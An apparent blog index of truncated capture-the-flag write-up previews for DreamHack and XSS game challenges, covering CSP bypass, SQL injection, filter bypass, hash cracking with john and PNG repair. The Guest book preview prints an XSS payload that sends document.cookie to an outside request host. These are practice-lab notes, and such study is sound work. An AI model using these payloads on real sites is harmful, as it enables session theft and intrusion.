  • Tried. Failed. Logged.
🏴CTF 88

XSS game - [2/6] Level 2: Persistence is key https://xss-game.appspot.com/level2 2023. 9. 10.
XSS game - [1/6] Level 1: Hello, world of XSS https://xss-game.appspot.com/level1 2023. 9. 10.
DreamHack - CSP Bypass Advanced write-up Why the JavaScript did not execute @app.after_request def add_header(response): global nonce response.headers['Content-Security-Policy'] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'; object-src 'none'" nonce = os.urandom(16).hex() return response It is because a CSP (Content-Security-Policy) header is attached on every request. Looking closer, because script-src is self, orig.. 2023. 9. 10.
DreamHack - chocoshop write-up Vulnerability r.expire(used_coupon, timedelta(seconds=coupon['expiration'] - int(time()))) First, removing the used coupon after (coupon expiration time + current time) like this seemed a bit suspicious, and if coupon['expiration'] { var coupon = res.coupon; fetch(url+"/coupon/submit", { "headers": { "accept": "*/*", "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", "authorization": aut.. 2023. 9. 9.
DreamHack - funjs write-up The key is setting breakpoints in the Sources tab of the developer tools. if (flag[_0x374fd6(0x17c)] != 0x24) { At first this conditional kept printing NOP!; to see what it means, enter flag[_0x374fd6(0x17c)] and 0x24 separately in the Console. The result confirms that it means if (flag.length != 36). I deliberately entered a 36-character flag value so execution would continue to the next line. Stepping through line by line in the same way, I finally found the loop that compares the user input with the real flag value, and by modifying it as shown below I was able to recover the real flag value. result = "" for (var i = 0x0; i < flag[_0x374.. 2023. 9. 9.
DreamHack - [wargame.kr] tmitter write-up Finding the page with the SQL Injection vulnerability First I put single quotes (‘) and double quotes (") into the login page and the sign-up page, but sign-up and login both worked without any particular problem. However, I noticed that the tmitter posting feature did not work properly when the nickname contained a single quote (’), which showed that the posting feature is vulnerable to SQLi. Checking the number of fields I tried to guess the SQL query used by the tmitter posting feature. At first I thought it might use a query like the one below, but then the attack did not work easily. insert into tmitter_board(id, msg) values ('guest', 'hello'); Anyway, I wrote message', null)# and posted it, confirmed that it was posted properly, and a few more fields .. 2023. 9. 9.
DreamHack - [wargame.kr] crack crack crack it write-up htpasswd blueh4g:$1$SVXyqAwy$iMW9SbLyUd1v6Fen7mNUe0 As soon as I saw it, the shadow file came to mind, and I assumed the format was [username]:[$password_id]:[$salt]:[$encrypted_password]. The first field, $1, indicates MD5. The challenge states that the password starts with G4HeulB and consists of lowercase letters and digits. I used the password-cracking tool john, with the mask option to generate candidate passwords made of the desired characters, and brute-forced it. john htpasswd -1=[0-9a-z] --mask='G4HeulB?1' --max-length=11 Within a few seconds the cracking succeeded.. 2023. 9. 9.
DreamHack - broken-png write-up image.png’s hex 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 02 00 00 00 01 00 The leading 89 50 4E 47 0D 0A 1A 0A 00 00 00 part is the PNG signature value. Right below it, 00 00 02 00 00 00 01 00 is where the width and height values are located, respectively. image.png’s width property 00 00 02 00 200(16) is 512(10), so the image's width is 512px. image.png’s height property 00 00 01 00 100(16) is 256(10), so the image's height is 256px. According to the challenge, the original was square, but.. 2023. 9. 8.
DreamHack - phpreg write-up First problem: finding a name that satisfies the condition Looking at the code below, it is immediately clear that the correct name is "dnyang0310". if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") However, the preg_replace below replaces "nyang" with a blank. $name = preg_replace("/nyang/i", "", $input_name); Replacing a word with a blank can easily be bypassed as follows. dnnyangyang0310 --> dn yang0310 --> dnyang0310 Second problem: finding a password that satisfies the condition Because of the condition below, the password cannot contain alphabetic characters. // pw filtering if (pr.. 2023. 9. 8.
DreamHack - out_of_boundary write-up out_of_boundary.c #include #include #include #include #include char name[16]; char *command[10] = { "cat", "ls", "id", "ps", "file ./oob" }; void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } int main() { int idx; initialize(); printf("Admin name: "); read(0, name.. 2023. 9. 8.
DreamHack - Guest book v0.2 write-up Finding the tags written at the bottom of the page first would have made solving the challenge faster. The contents of config.js are as follows. window.CONFIG = { version: "v0.2", main: "/", debug: false, debugMSG: "" } // prevent overwrite Object.freeze(window.CONFIG); Because of the Object.freeze method, window.CONFIG cannot be overwritten, the if condition evaluates to false, and the "location.href = window.CONFIG.main" line below is not executed. How to bypass config.js There was one problem on that side: the .js resource (config.js) is read using a relative path.. 2023. 9. 7.
DreamHack - Guest book write-up Method 1. Using name and onfocus [dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie') URL-encode the text above. %5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29 Pass the encoded value as the content parameter; the key is to include #foo at the end of the URL http:.. 2023. 9. 7.